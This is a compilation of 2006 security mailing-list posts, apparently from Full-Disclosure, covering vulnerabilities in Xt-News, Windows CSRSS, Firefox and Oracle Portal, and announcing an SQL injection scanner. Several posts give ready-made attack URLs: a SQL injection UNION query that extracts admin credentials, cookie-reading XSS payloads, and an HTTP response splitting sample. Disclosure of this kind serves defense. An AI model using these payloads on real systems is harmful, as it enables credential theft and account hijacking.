Xt-News 0.1 : SQL Injection Vulnerability XSS
Xt-News 0.1 --- Vendor site: http://dreaxteam.free.fr/forums/ Product: Xt-News 0.1 Vulnerability: SQL Injection Vulnerability XSS Credits: Mr_KaLiMaN Reported to Vendor: 10/12/06 Public disclosure: 22/12/06 Description: SQL Injection Vulnerability: http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION] http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1# XSS: http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS] http://[victim]/[script_news_path]/add_comment.php?id_news=;scriptalert(document.cookie)/scriptfoo http://[victim]/[script_news_path]/show_news.php?id_news=[XSS] http://[victim]/[script_news_path]/show_news.php?id_news='scriptalert(document.cookie)/scriptfoo ' ---
Re: Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Well, Just a warning b4 running the proof of concept... Make sure to close and save useful stuff. It indeed works on xp sp2 and it will reboot your machiene. I have to say, This would be trick to exploit another programs messagebox, and wha joy could you possibly get out of restarting someone computer. I dont think there is possiblility for any code execution, as far as I seen. Would be a nice S-Kiddy toy if you could do it remotely, but would also piss off alot of people.
RE: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Holy mackerel! Instances of this bug date back to 1999! Different bug. That appears to be a trivial exhaustion of CSRSS worker threads through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which causes a DoS as no threads are available to serve kernel-mode requests from win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated thread is used for such notifications, not just any thread, any time. Easily verifiable with local net sends and Spy++. It wasn't a bug either, more like a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in a worker thread) - not at all like this double-free
rPSA-2006-0234-1 firefox
rPath Security Advisory: 2006-0234-1 Published: 2006-12-22 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.9-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505 https://issues.rpath.com/browse/RPL-883 Description: Previous versions of the firefox package are vulnerable to multiple types of attacks, including one that enables an attacker to run arbitrary attacker-provided executable code if JavaScript is enabled.
Oracle Applications/Portal 9i/10g Cross Site Scripting
Description --- There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the Oracle Portal. The following is one that you may found in any version: http://target/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');// The following code will be generated: ---SNIPPED--- script language=javascript top.null = null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now', 'null');//.render(window); /script ---SNIPPED--- Solution There is no solution. As a workaround, enable mod_security if it's not. Otherwise wait 6 months/1 year for a patch from Oracle Corp. _ Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con MSN Entretenimiento. http://entretenimiento.msn.es/
Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
From: Brian Eaton [EMAIL PROTECTED] To: putosoft softputo [EMAIL PROTECTED] CC: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting Date: Wed, 20 Dec 2006 13:55:09 -0500 On 12/20/06, putosoft softputo [EMAIL PROTECTED] wrote: Oracle Portal/Applications HTTP Response Splitting -- Sample: http://target/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E So they let the URL specify the content-encoding? They might be vulnerable to XSS via UTF-7 as well. Regards, Brian Yeah, it is. _ Moda para esta temporada. Ponte al día de todas las tendencias. http://www.msn.es/Mujer/moda/default.asp
SQID v0.2 - SQL Injection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites.Current version looks for SQL injections and common errors in website urls found by performing a google search. The use of google search SOAP API has been removed due to no more issuing of keys. Now it directly performs search over the web. Sqid can be downloaded from http://sqid.rubyforge.org. -- MSG // http://www.metaeye.org